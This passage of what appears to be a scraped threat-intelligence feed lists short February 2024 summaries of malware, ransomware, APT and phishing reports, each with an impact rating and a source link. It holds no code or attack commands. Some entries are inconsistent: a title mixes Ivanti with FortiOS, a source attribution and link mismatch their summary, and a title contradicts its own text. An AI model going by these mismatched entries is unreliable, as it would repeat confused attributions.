MEDIUM
Summary:
Researchers from Cisco Talos have observed that a number of banking trojans, including Astaroth (also known as Guildma), Mekotio, and Ousaban, are being distributed to targets throughout Europe and Latin America through the abuse of Google Cloud Run in high-volume malware distribution campaigns. Since September 2023, the volume of emails related to these campaigns has grown dramatically, and Talos continues to monitor for new email distribution campaigns. The infection chains linked to the various malware families feature malicious Microsoft Installers (MSIs) that serve as droppers or downloaders for the final malware payloads.
Source: https://blog.talosintelligence.com/google-cloud-run-abuse/
2024-02-21
Decrypted_HomuWitch_Ransomware
LOW
+
Intel Source:
Huntress
Intel Name:
Decrypted_HomuWitch_Ransomware
Date of Scan:
2024-02-21
Impact:
LOW
Summary:
During the investigation of this threat, a vulnerability was discovered that allowed Huntress analysts to create a free decryption tool for all HomuWitch victims. HomuWitch is a ransomware strain that initially emerged in July 2023. It contains a flaw in its encryption process that allows victims to recover all their files without paying the ransom.
Source: https://malware.news/t/decrypted-homuwitch-ransomware/78949
2024-02-21
The_deployment_of_the_Kazuar_malware
LOW
+
Intel Source:
Lab52 blog
Intel Name:
The_deployment_of_the_Kazuar_malware
Date of Scan:
2024-02-21
Impact:
LOW
Summary:
This article focuses on a new sample used by the Turla APT group in their attacks, which uses a wrapper called Pelmeni and deploys the Kazuar malware. The article compares this sample with a previous one and confirms the use of a substitution algorithm similar to Kazuar's. It also discusses the use of a new protocol for exfiltration and a different log folder. The article provides indicators of compromise and hashes for the samples used. The section titled "Pelmeni Wrapper" provides a detailed analysis of the wrapper, its structure, and its functions. The article also discusses the Turla group's history and their use of the DLL sideloading technique. The following section delves into the analysis of the .NET binary extracted from the wrapper.
Source: https://lab52.io/blog/pelmeni-wrapper-new-wrapper-of-kazuar-turla-backdoor/
2024-02-21
Migo_Malware_Targeting_Redis_for_Cryptocurrency_Mining
LOW
Intel Source:
Cado Security Labs
Intel Name:
Migo_Malware_Targeting_Redis_for_Cryptocurrency_Mining
Date of Scan:
2024-02-21
Impact:
LOW
Summary:
Researchers from Cado Security Labs have encountered a new malware campaign that focuses on exploiting Redis for initial access. Although Redis has been a common target for Linux and cloud-centric attackers, this specific campaign employs unique system weakening techniques against the data store. The malware, known as Migo, is designed by its developers to compromise Redis servers with the goal of cryptocurrency mining on the underlying Linux host.
Source: https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/
2024-02-21
Malicious_Actors_Exploiting_Open_Source_Code_in_Software_Supply_Chains
LOW
Intel Source:
Reversing Labs
Intel Name:
Malicious_Actors_Exploiting_Open_Source_Code_in_Software_Supply_Chains
Date of Scan:
2024-02-21
Impact:
LOW
Summary:
The article explores the growing trend of cybercriminals utilizing open-source code and package managers for malicious activities. Instead of relying on traditional methods like spearphishing, attackers are now planting malware in open-source repositories. The emergence of DLL sideloading attacks, typically associated with compromised environments, is now evident in open-source incidents. The identification of malicious PyPI packages underscores a broader pattern of cyber threats leveraging DLL sideloading to compromise software supply chains. This highlights the importance of increased security monitoring and integrity checks for both software producers and organizations.
Source: https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls
2024-02-21
Information_Campaign_Regarding_War_That_Targets_Speakers_of_Ukrainian
LOW
Intel Source:
Welivesecurity
Intel Name:
Information_Campaign_Regarding_War_That_Targets_Speakers_of_Ukrainian
Date of Scan:
2024-02-21
Impact:
LOW
Summary:
Operation Texonto is a disinformation/PSYOP campaign that primarily distributes its message via spam emails. Remarkably, the operators do not appear to have disseminated their statements via popular platforms like Telegram or fake websites. ESET researchers identified two distinct waves, in November 2023 and at the end of December 2023 respectively. The emails' topics, which are common in Russian propaganda, included food shortages, medicine shortages, and heating outages.
Source: https://www.welivesecurity.com/en/eset-research/operation-texonto-information-operation-targeting-ukrainian-speakers-context-war/
2024-02-20
Dynamic_Sandbox_Detection_in_Python_InfoStealer
LOW
Intel Source:
ISC.SANS
Intel Name:
Dynamic_Sandbox_Detection_in_Python_InfoStealer
Date of Scan:
2024-02-20
Impact:
LOW
Summary:
Python-based infostealers are not new. They also incorporate several sandbox detection methods to evade execution (and likely detection) under automated analysis. Researchers from ISC.SANS discovered one last week that takes a similar but distinct approach. Typically, such scripts include a hard-coded list of "bad stuff" to look for, such as usernames, processes, MAC addresses, etc.
Source: https://isc.sans.edu/diary/Python+InfoStealer+With+Dynamic+Sandbox+Detection/30668/
2024-02-20
The_technical_analysis_of_the_Backmydata_ransomware
LOW
Intel Source:
CyberGeeks
Intel Name:
The_technical_analysis_of_the_Backmydata_ransomware
Date of Scan:
2024-02-20
Impact:
LOW
Summary:
The article provides a technical analysis of the BackMyData ransomware, which was used to attack hospitals in Romania. The Abstract section gives an overview of the ransomware's actions, including encryption of files using AES256 and dropping ransom notes. The Technical Analysis section delves into the ransomware's code and methods, such as disabling the firewall and deleting Volume Shadow Copies. It also explains how the ransomware establishes persistence and encrypts files with specific extensions. The article also provides indicators of compromise and references for further information on the ransomware.
Source: https://cybergeeks.tech/a-technical-analysis-of-the-backmydata-ransomware-used-to-attack-hospitals-in-romania/
2024-02-20
Advanced_version_of_ObserverStealer_AsukaStealer_malware
MEDIUM
Intel Source:
Cyble
Intel Name:
Advanced_version_of_ObserverStealer_AsukaStealer_malware
Date of Scan:
2024-02-20
Impact:
MEDIUM
Summary:
The article discusses a new type of information-stealing malware called AsukaStealer, which is being offered as a service on Russian cybercrime forums. It is a revamped version of the ObserverStealer and uses tactics, techniques, and procedures (TTPs) identified by the MITRE ATT&CK framework, including credential access, discovery, and collection, as well as remote system discovery and data collection. The article also provides a list of indicators of compromise (IoCs) associated with AsukaStealer, such as IP addresses and file hashes.
Source: https://cyble.com/blog/asukastealer-a-revamped-version-of-the-observerstealer-advertised-as-malware-as-a-service/
2024-02-20
Iranian_and_Hezbollah_Hackers_Attack_to_Influence_Israel_Hamas_Narrative
MEDIUM
Intel Source:
Google Blog
Intel Name:
Iranian_and_Hezbollah_Hackers_Attack_to_Influence_Israel_Hamas_Narrative
Date of Scan:
2024-02-20
Impact:
MEDIUM
Summary:
Cybercriminals supported by Hezbollah and Iran orchestrated cyberattacks with the intention of eroding public support for the Israel-Hamas conflict following October 2023. This includes devastating attacks on important Israeli institutions, hack-and-leak schemes aimed at American and Israeli organizations, phishing scams intended to obtain intelligence, and disinformation tactics to sway public opinion against Israel. In the six months preceding the attacks of October 7, Iran was responsible for almost eighty percent of all government-sponsored phishing attempts directed at Israel.
Source: https://blog.google/technology/safety-security/tool-of-first-resort-israel-hamas-war-in-cyber/
2024-02-20
Hackers_from_North_Korea_Linked_to_Defense_Sector_Supply_Chain_Attack
MEDIUM
Intel Source:
BfV & NIS
Intel Name:
Hackers_from_North_Korea_Linked_to_Defense_Sector_Supply_Chain_Attack
Date of Scan:
2024-02-20
Impact:
MEDIUM
Summary:
Both the National Intelligence Service (NIS) of South Korea and the Federal Intelligence Agency (BfV) of Germany have issued an advisory alert regarding an ongoing cyber-espionage campaign on behalf of the North Korean government that targets the global defense sector. The strikes are intended to steal information on cutting-edge military technology and assist North Korea in modernizing its conventional weapons and creating new military capabilities.
Source: https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2
2024-02-20
RemoteRATRemoval_types_and_mitigation
LOW
Intel Source:
Sucuri
Intel Name:
RemoteRATRemoval_types_and_mitigation
Date of Scan:
2024-02-20
Impact:
LOW
Summary:
The article titled "Remote Access Trojan (RAT): Types, Mitigation & Removal" provides a comprehensive overview of RATs, a type of malware that allows attackers to gain remote access and control over infected systems. The article discusses the various types of RATs, their infiltration techniques, command-and-control communication, and stealth mechanisms. It also highlights the dangers of RAT attacks, including data theft, botnets, and ransomware deployment. The article emphasizes the importance of website security in preventing the spread of RATs and provides tips for removing RATs and protecting against them. It also discusses the role of RATs in website security and provides examples of how websites can spread RAT infections. The article concludes by recommending website security best practices and the use of a web application firewall to protect against RATs.
Source: https://blog.sucuri.net/2024/02/remote-access-trojan-rat-types-mitigation-removal.html
2024-02-20
Hackers_Exploit_Critical_RCE_Flaw_In_Bricks_Builder_Theme
LOW
Intel Source:
bleepingcomputer
Intel Name:
Hackers_Exploit_Critical_RCE_Flaw_In_Bricks_Builder_Theme
Date of Scan:
2024-02-20
Impact:
LOW
Summary:
The article highlights the active exploitation of a significant vulnerability in the widely used Bricks Builder Theme for WordPress, which has approximately 25,000 installations. The flaw permits remote code execution (RCE), allowing harmful PHP code to be run. The issue stems from an eval function call within the 'prepare_query_vars_from_settings' function, which provides an avenue for unauthenticated users to exploit it. The Patchstack platform promptly reported the vulnerability to the Bricks team, resulting in the release of a fix in version 1.9.6.1 on February 13. Despite the absence of evidence of exploitation at the time, users are strongly advised to upgrade to ensure heightened security.
Source: https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-rce-flaw-in-bricks-wordpress-site-builder/
2024-02-20
Earth_Preta_Campaign_Targets_Asian_Countries_with_DOPLUGS
MEDIUM
Intel Source:
Trendmicro
Intel Name:
Earth_Preta_Campaign_Targets_Asian_Countries_with_DOPLUGS
Date of Scan:
2024-02-20
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have noted that the customized PlugX malware differs from the standard PlugX malware: it is used only to download the latter and does not contain a complete backdoor command module. Because of these unique features, they chose to rename this modified PlugX variant DOPLUGS. Investigating further, they discovered that the DOPLUGS malware was using the KillSomeOne module.
Source: https://www.trendmicro.com/en_us/research/24/b/earth-preta-campaign-targets-asia-doplugs.html
2024-02-19
Attackers_Using_Mirai_Botnet_on_Open_Internet
LOW
Intel Source:
ISC.SANS
Intel Name:
Attackers_Using_Mirai_Botnet_on_Open_Internet
Date of Scan:
2024-02-19
Impact:
LOW
Summary:
ISC.SANS researchers have examined how hackers are utilizing the Mirai Botnet malware to target openly accessible Internet of Things devices and take advantage of security holes.
Source: https://isc.sans.edu/diary/MiraiMirai+On+The+Wall+Guest+Diary/30658
2024-02-19
TAG_70_Hackers_Targeting_European_Government_and_Military_Mail_Servers
LOW
Intel Source:
Recorded Future
Intel Name:
TAG_70_Hackers_Targeting_European_Government_and_Military_Mail_Servers
Date of Scan:
2024-02-19
Impact:
LOW
Summary:
Recorded Future researchers have spotted TAG-70 using cross-site scripting (XSS) vulnerabilities against European Roundcube webmail servers, specifically targeting organizations associated with national infrastructure, the military, and government. Activity reported by other security vendors under the names Winter Vivern, TA473, and UAC-0114 overlaps with TAG-70. The group has been active since at least December 2020 and mainly targets governments in Europe and Central Asia. It probably runs cyber-espionage operations to further the objectives of Belarus and Russia.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0217.pdf
2024-02-19
An_Analysis_of_BackMyData_Ransomware_That_Attacked_Romanian_Hospitals
LOW
Intel Source:
CyberMasterV
Intel Name:
An_Analysis_of_BackMyData_Ransomware_That_Attacked_Romanian_Hospitals
Date of Scan:
2024-02-19
Impact:
LOW
Summary:
Researchers report that a ransomware attack that began on February 11 forced 100 hospitals in Romania to shut down their computer systems. The BackMyData ransomware, which was responsible for it, is a member of the Phobos family. The malware embeds an AES key that is used to decrypt its configuration, which includes information on whitelisted files, directories, and extensions, as well as a public RSA key that is used to encrypt the AES keys used to encrypt data.
Source: https://cybergeeks.tech/a-technical-analysis-of-the-backmydata-ransomware-used-to-attack-hospitals-in-romania/
2024-02-19
Cybercriminals_Using_RustDoor_and_GateDoor_as_Fake_Software
LOW
Intel Source:
S2W Blog
Intel Name:
Cybercriminals_Using_RustDoor_and_GateDoor_as_Fake_Software
Date of Scan:
2024-02-19
Impact:
LOW
Summary:
The Rust-based macOS malware known as RustDoor was identified and actively monitored by S2W's threat intelligence center in December 2023. After additional investigation they discovered a Windows version of RustDoor, and since it was written in Golang rather than Rust, they named it GateDoor. It has been confirmed that both RustDoor and GateDoor are distributed disguised as legitimate software updates or programs.
Source: https://medium.com/s2wblog/rustdoor-and-gatedoor-a-new-pair-of-weapons-disguised-as-legitimate-software-by-suspected-34c94e558b40
2024-02-19
Deep_Dive_into_MrAgent_and_Ransomware_Negotiations
MEDIUM
Intel Source:
Trellix
Intel Name:
Deep_Dive_into_MrAgent_and_Ransomware_Negotiations
Date of Scan:
2024-02-19
Impact:
MEDIUM
Summary:
Trellix profiles a Ransomware-as-a-Service group known for its MrAgent tool, which automates ransomware deployment. Highlighting the group's focus on double extortion schemes, the analysis covers their targeting strategy, negotiation tactics with victims, and the technical workings of MrAgent. Additionally, it examines the financial trail of ransom payments, offering insights into the group's operational and financial tactics.
Source: https://www.trellix.com/blogs/research/ransomhouse-am-see/
2024-02-16
Unauthorized_access_to_two_publicly_facing_Confluence_servers
MEDIUM
Intel Source:
Rapid7
Intel Name:
Unauthorized_access_to_two_publicly_facing_Confluence_servers
Date of Scan:
2024-02-16
Impact:
MEDIUM
Summary:
Rapid7 Incident Response investigated an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers.
Source: https://www.rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
2024-02-16
A_Novel_AWS_SNS_based_Smishing_Attack_Tool
LOW
Intel Source:
SentinelLabs
Intel Name:
A_Novel_AWS_SNS_based_Smishing_Attack_Tool
Date of Scan:
2024-02-16
Impact:
LOW
Summary:
SentinelLabs discovered SNS Sender, a pioneering tool exploiting AWS's Simple Notification Service (SNS) for smishing (SMS phishing) campaigns. Authored by ARDUINO_DAS, a figure already known in the phishing scene, this tool signifies a shift in how threat actors leverage cloud services for malicious activities. SNS Sender uniquely uses AWS SNS for bulk SMS spamming to distribute phishing links, often under the guise of USPS notifications about missed package deliveries.
Source: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
2024-02-16
The_spread_of_utility_scam_campaign_thru_online_ads
LOW
Intel Source:
Malwarebytes
Intel Name:
The_spread_of_utility_scam_campaign_thru_online_ads
Date of Scan:
2024-02-16
Impact:
LOW
Summary:
The Malwarebytes blog explains how the scam works: criminals impersonate a utility company so they can threaten victims and extort as much money from them as possible. It also describes how analysts observed and collected many fraudulent utility-scam ads and the fake sites they lead to.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/massive-utility-scam-campaign-spreads-via-online-ads
2024-02-16
Comparative_Analysis_of_Alpha_and_NetWalker_Ransomware_Versions
LOW
Intel Source:
Symantec
Intel Name:
Comparative_Analysis_of_Alpha_and_NetWalker_Ransomware_Versions
Date of Scan:
2024-02-16
Impact:
LOW
Summary:
Analyzing Alpha reveals that it is a lot like the previous version of the NetWalker ransomware. The payload is delivered by a similar PowerShell-based loader in both threats. Furthermore, there is a substantial amount of code overlap between the payloads for Alpha and NetWalker.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/alpha-netwalker-ransomware
2024-02-16
Agniane_information_stealer_malware
LOW
Intel Source:
Cisco Talos
Intel Name:
Agniane_information_stealer_malware
Date of Scan:
2024-02-16
Impact:
LOW
Summary:
The Agniane Stealer is an information-stealing malware that targets the cryptocurrency wallets of its victims. A recent campaign of these attacks was observed, and Cisco Talos analysts identified and provided a detailed analysis of a previously unrecognized network URL pattern. They also uncovered more information on the malware's methods for file collection and the intricacies of its command and control (C2) protocol.
Source: https://blogs.cisco.com/security/agniane-stealer-information-stealer-targeting-cryptocurrency-users
2024-02-16
TA544_Exploiting_Danabot_Malware_Again
LOW
Intel Source:
CERT-AGID
Intel Name:
TA544_Exploiting_Danabot_Malware_Again
Date of Scan:
2024-02-16
Impact:
LOW
Summary:
Three months have passed since the last wave in November 2023, and there is still a significant effort targeting Italian users that uses the "Revenue Agency" concept to disseminate malware. This new threat seeks to install the Danabot malware on victims' devices in order to obtain unauthorized access to sensitive data. It has been identified as the work of the criminal group TA544, which is skilled in targeted attacks using spear phishing and social engineering and is notorious for spreading the Gozi Ursnif malware.
Source: https://cert-agid.gov.it/news/il-gruppo-ta544-cambia-ancora-strategia-sfruttando-lutilizzo-del-malware-danabot/
2024-02-15
Advanced_Cybercriminals_rapidly_diversify_cyberattack_channels
MEDIUM
Intel Source:
Eclecticiq
Intel Name:
Advanced_Cybercriminals_rapidly_diversify_cyberattack_channels
Date of Scan:
2024-02-15
Impact:
MEDIUM
Summary:
EclecticIQ analysts looked at recent Ivanti vulnerabilities and the infrastructure connected to the earliest reported activity. The analysts described new, previously unreported infrastructure that may be linked to similar exploitation attempts.
Source: https://blog.eclecticiq.com/advanced-cybercriminals-rapidly-diversify-cyberattack-channels-following-public-vulnerability-disclosure
2024-02-15
Kryptina_RaaS
LOW
Intel Source:
SentinelOne
Intel Name:
Kryptina_RaaS
Date of Scan:
2024-02-15
Impact:
LOW
Summary:
SentinelOne analysts detailed in their blog the development, technical details, and implications of the Kryptina RaaS and its move into open-source crimeware.
Source: https://www.sentinelone.com/blog/kryptina-raas-from-underground-commodity-to-open-source-threat/
2024-02-15
Data_Leakage_via_Finger
LOW
Intel Source:
Huntress
Intel Name:
Data_Leakage_via_Finger
Date of Scan:
2024-02-15
Impact:
LOW
Summary:
Researchers at Huntress have examined a past Windows Defender detection, or what they call a "Managed Antivirus" (MAV) alert, looking for the finger.exe command line that sent a series of digits to the IP address linked to the November activity.
Source: https://www.huntress.com/blog/threat-intel-accelerates-detection-and-response
2024-02-15
TicTacToe_Dropper_Analysis
MEDIUM
Intel Source:
Fortinet
Intel Name:
TicTacToe_Dropper_Analysis
Date of Scan:
2024-02-15
Impact:
MEDIUM
Summary:
While analyzing new malware samples collected from several victims, the FortiGuard researchers identified a grouping of malware droppers used to deliver various final-stage payloads throughout 2023.
Source: https://www.fortinet.com/blog/threat-research/tictactoe-dropper
2024-02-15
TinyTurla_Next_Generation
LOW
Intel Source:
Cisco Talos
Intel Name:
TinyTurla_Next_Generation
Date of Scan:
2024-02-15
Impact:
LOW
Summary:
Cisco Talos has observed a new backdoor managed by the Turla APT group, a Russian cyber espionage threat group. This new backdoor, called "TinyTurla-NG" (TTNG), is similar to another Turla backdoor, TinyTurla, in coding style and functionality implementation.
Source: https://blog.talosintelligence.com/tinyturla-next-generation/
2024-02-15
New_Tax_Fraud_Scheme
LOW
Intel Source:
Zerofox
Intel Name:
New_Tax_Fraud_Scheme
Date of Scan:
2024-02-15
Impact:
LOW
Summary:
This month the Russian threat actor "Journalist" shared, on the Russian-speaking community "Coockie Pro," a method of leveraging the legitimate gocardless[.]com service to discover corporate employer identification numbers (EINs) in order to perform tax fraud schemes against U.S. citizens.
Source: https://www.zerofox.com/blog/flash-report-new-tax-fraud-scheme-leveraging-employee-identification-numbers/
2024-02-14
A_new_sophisticated_GoBased_JKwerlo_ransomware_variant
LOW
Intel Source:
Cyble
Intel Name:
A_new_sophisticated_GoBased_JKwerlo_ransomware_variant
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
Cyble researchers analyzed a new sophisticated Go-based JKwerlo ransomware variant that targeted French- and Spanish-speaking users.
Source: https://cyble.com/blog/new-go-based-jkwerlo-ransomware-poses-a-risk-to-french-and-spanish-users/
2024-02-14
CharmingCypress_malware_family
LOW
Intel Source:
Volexity
Intel Name:
CharmingCypress_malware_family
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
Volexity's post was published to share observations of CharmingCypress malware family activity from 2023 to early 2024, including details on the techniques the threat actor has used to distribute the malware.
Source: https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/
2024-02-14
Malware_spread_via_YouTube_Videos
LOW
Intel Source:
Cyfirma
Intel Name:
Malware_spread_via_YouTube_Videos
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
Cybereason has observed threat actors exploiting older YouTube accounts to host links to malware (including infostealers like RedLine and Raccoon Stealer and other commodity malware like SmokeLoader) that masquerades as cracked versions of popular paid software.
Source: https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/
2024-02-14
Malware_development_competition
LOW
Intel Source:
Cyfirma
Intel Name:
Malware_development_competition
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
The CYFIRMA research team has observed a sharp rise in malware being distributed on a Russian hacking forum at no cost. The forum administrators had announced a malware development competition on 1st November 2023.
Source: https://www.cyfirma.com/outofband/malware-development-competition-fuels-creation-of-20-malware/
2024-02-14
Water_Hydra_Exploits_Zero_Day_Vulnerabilities
LOW
Intel Source:
trendmicro
Intel Name:
Water_Hydra_Exploits_Zero_Day_Vulnerabilities
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
In its attacks aimed at financial market traders, the APT organization Water Hydra has been taking advantage of the Microsoft Defender SmartScreen vulnerability (CVE-2024-21412). The Trend Micro Zero Day Initiative found and made public this vulnerability, which Microsoft has now fixed.
Source: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
2024-02-14
Phishing_Attacks_Using_Remote_Monitoring_and_Management_Software
LOW
Intel Source:
Malwarebytes
Intel Name:
Phishing_Attacks_Using_Remote_Monitoring_and_Management_Software
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
Researchers at Malwarebytes have investigated a specific phishing scheme using the AnyDesk remote software to target business users. IT administrators may streamline activities and ensure network integrity remotely with the use of popular products like AnyDesk, Atera, and Splashtop, which are examples of remote monitoring and management (RMM) software. Cybercriminals, however, have noticed these same tools and are using them to breach corporate networks and steal confidential information.
Source: https://www.malwarebytes.com/blog/news/2024/02/remote-monitoring-management-software-used-in-phishing-attacks
2024-02-14
Emergence_of_Novel_SocGholish_Infection_Chain
LOW
Intel Source:
ReliaQuest
Intel Name:
Emergence_of_Novel_SocGholish_Infection_Chain
Date of Scan:
2024-02-14
Impact:
LOW
Summary:
Researchers from ReliaQuest have found suspicious JavaScript files in client environments, such as "update.js," a file name frequently used by malware that poses as an update, such as SocGholish. Upon examining the first-stage payload's execution, they discovered a novel characteristic of this malware: the introduction of Python for persistence.
Source: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/
2024-02-13
Warzone_RAT_Cybercriminals_caught
LOW
Intel Source:
Malwarebytes
Intel Name:
Warzone_RAT_Cybercriminals_caught
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
The article highlights an international operation that acquired domains involved in the sale of information-stealing malware. Federal authorities in Boston took control of www.warzone.ws and three associated domains, which were selling the sophisticated Warzone RAT malware. This Remote Access Trojan (RAT) allowed cybercriminals to access victims' file systems, capture screenshots, record keystrokes, steal usernames and passwords, and even monitor victims through their web cameras, all without their awareness or consent.
Source: https://www.malwarebytes.com/blog/news/2024/02/warzone-rat-infrastructure-seized
2024-02-13
In_depth_examination_of_Akira_ransomware
LOW
Intel Source:
HHS GOV
Intel Name:
In_depth_examination_of_Akira_ransomware
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
In its brief existence, the Akira ransomware group has proven to be a formidable and proficient adversary of the American healthcare industry. Akira makes use of many shared elements in its operations and targeting. The group functions as ransomware-as-a-service (RaaS), meaning it concentrates on ransomware operations while collaborating with other cybercriminals to launch targeted attacks and split the extorted money.
Source: https://www.hhs.gov/sites/default/files/akira-randsomware-analyst-note-feb2024.pdf
2024-02-13
The_Mirai_Bot_Exploits_Bytevalue_Router_Vulnerability
LOW
Intel Source:
ISC.SANS
Intel Name:
The_Mirai_Bot_Exploits_Bytevalue_Router_Vulnerability
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
Researchers at ISC.SANS have examined a URL that surfaced in their "First Seen" list. At first, the sensors picked up requests for "goform/webRead/open" alone. URLs containing "goform" are usually connected to the RealTek SDK. The SDK is typically used by routers built around RealTek SoCs (Systems on a Chip) to implement web-based management features. The RealTek SDK has historically had a lot of vulnerabilities. Currently, the honeypots track more than 900 distinct URLs containing "/goform/".
Source: https://isc.sans.edu/diary/Exploit+against+Unnamed+Bytevalue+router+vulnerability+included+in+Mirai+Bot/30642/
2024-02-13
Cyberattack_Targeting_Executives_Using_Microsoft_Azure
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Cyberattack_Targeting_Executives_Using_Microsoft_Azure
Date of Scan:
2024-02-13
Impact:
MEDIUM
Summary:
Proofpoint researchers have identified an active cloud account takeover campaign targeting Microsoft Azure environments. The attack, combining credential phishing and cloud account takeover tactics, has impacted various organizations globally. Threat actors utilize individualized phishing lures within shared documents, directing users to malicious webpages. Diverse roles, including senior executives, are targeted, with a specific Linux user-agent identified. Post-compromise activities involve MFA manipulation, data exfiltration, internal and external phishing, financial fraud attempts, and mailbox rule creation. The attackers' operational infrastructure includes proxies, data hosting services, and hijacked domains, posing challenges for defenders. While no specific attribution is provided, Russian and Nigerian attackers are noted as potential actors. The Proofpoint team recommends enhanced security measures, including user training, multi-factor authentication, and continuous monitoring.
Source: https://www.proofpoint.com/us/blog/cloud-security/community-alert-ongoing-malicious-campaign-impacting-azure-cloud-environments
2024-02-13
Bumblebee_is_Back
LOW
Intel Source:
Proofpoint
Intel Name:
Bumblebee_is_Back
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
On February 8, 2024, Proofpoint researchers discovered that the Bumblebee malware had reappeared in the cybercriminal threat landscape following a four-month hiatus. Cybercriminal threat actors employ the sophisticated downloader known as Bumblebee, which was a preferred payload from its initial appearance in March 2022 until October 2023, when it vanished.
Source: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black
2024-02-13
Attackers_Exploiting_Ivanti_SSRF_Flow_to_Deploy_DSLog_Backdoor
MEDIUM
Intel Source:
Orange Cyberdefense
Intel Name:
Attackers_Exploiting_Ivanti_SSRF_Flow_to_Deploy_DSLog_Backdoor
Date of Scan:
2024-02-13
Impact:
MEDIUM
Summary:
Attackers are exploiting a server-side request forgery (SSRF) vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA gateways to install the new DSLog backdoor on vulnerable devices. On Ivanti gateways running versions 9.x and 22.x, the vulnerability affects the SAML component of those products and enables attackers to bypass authentication and access restricted resources.
Source: https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf
2024-02-13
MSSQL_Server_Compromise_and_Ransomware_Threat
MEDIUM
Intel Source:
Huntress
Intel Name:
MSSQL_Server_Compromise_and_Ransomware_Threat
Date of Scan:
2024-02-13
Impact:
MEDIUM
Summary:
Huntress researchers have unveiled sophisticated tactics used by attackers targeting MSSQL servers, including the use of the bulk copy command for file extraction and the deployment of scripts for unauthorized account creation and remote access tool installation.
Source: https://www.huntress.com/blog/attacking-mssql-servers
2024-02-13
PikaBot_Appears_Again_with_Simplified_Code_and_Clever_Strategies
LOW
Intel Source:
Zscaler
Intel Name:
PikaBot_Appears_Again_with_Simplified_Code_and_Clever_Strategies
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
Zscaler researchers have discovered that the threat actors responsible for the PikaBot malware have undergone a "devolution," making notable modifications to the malware. The developers have removed sophisticated obfuscation techniques and altered the network communications, which has reduced the complexity of the code, even though it appears to be in a new development cycle and testing phase.
Source: https://www.zscaler.com/blogs/security-research/d-evolution-pikabot
2024-02-13
Glupteba_botnet_using_undocumented_UEFI_Bootkit_to_Avoid_Detection
LOW
Intel Source:
Palo Alto
Intel Name:
Glupteba_botnet_using_undocumented_UEFI_Bootkit_to_Avoid_Detection
Date of Scan:
2024-02-13
Impact:
LOW
Summary:
It has been discovered that the Glupteba botnet is using previously unreported Unified Extensible Firmware Interface (UEFI) bootkit functionality, which gives the malware an extra degree of stealth and sophistication. By interfering with and controlling the operating system boot process, this bootkit allows Glupteba to conceal itself and establish a covert persistence that can be very challenging to find and eliminate.
Source: https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/#post-132484-_ydqdbjg0dngh
2024-02-13
RAT_Distribution_Leveraging_Legitimate_Tools_for_Stealth
MEDIUM
Intel Source:
ASEC
Intel Name:
RAT_Distribution_Leveraging_Legitimate_Tools_for_Stealth
Date of Scan:
2024-02-13
Impact:
MEDIUM
Summary:
ASEC researchers have uncovered a complex cyberattack scheme employing legitimate software tools alongside malicious files to distribute Revenge RAT malware stealthily. Attackers execute a malicious setup.exe file under the guise of running legitimate tools such as smtp-validator and Email To Sms, making detection by users challenging. The malware establishes persistence by hiding its components and manipulating the Windows registry for autorun, then downloads additional payloads from a C2 server disguised as a benign blog. This multi-stage attack involves evasion techniques, such as using the CMSTP method for bypassing antivirus detection and employing fileless execution of Revenge RAT, to perform various malicious activities including data theft.
Source: https://asec.ahnlab.com/en/61584/
2024-02-12
Cyber_spies_Sticky_Werewolf_activity_in_Belarus
LOW
Intel Source:
Habr
Intel Name:
Cyber_spies_Sticky_Werewolf_activity_in_Belarus
Date of Scan:
2024-02-12
Impact:
LOW
Summary:
The cyber-espionage APT group Sticky Werewolf probably attempted to attack Belarusian companies by distributing the Ozone RAT remote access Trojan under the guise of the CCleaner computer cleaning and optimization software.
Source: https://habr.com/ru/companies/f_a_c_c_t/news/792672/
2024-02-12
A_malicious_PowerShell_payload_Rabby_Wallet
LOW
Intel Source:
ISC.SANS
Intel Name:
A_malicious_PowerShell_payload_Rabby_Wallet
Date of Scan:
2024-02-12
Impact:
LOW
Summary:
ISC.SANS researcher Xavier Mertens reports that one of his YARA rules triggered on a new sample called "Rabby-Wallet.msix", which has a VT score of 8/58. His analysis shows that the file implements the same technique to execute a malicious PowerShell payload.
Source: https://isc.sans.edu/diary/rss/30636
2024-02-12
A_new_Ivanti_critical_Remote_Code_Execution_vulnerability_in_FortiOS
HIGH
Intel Source:
SOCRadar
Intel Name:
A_new_Ivanti_critical_Remote_Code_Execution_vulnerability_in_FortiOS
Date of Scan:
2024-02-12
Impact:
HIGH
Summary:
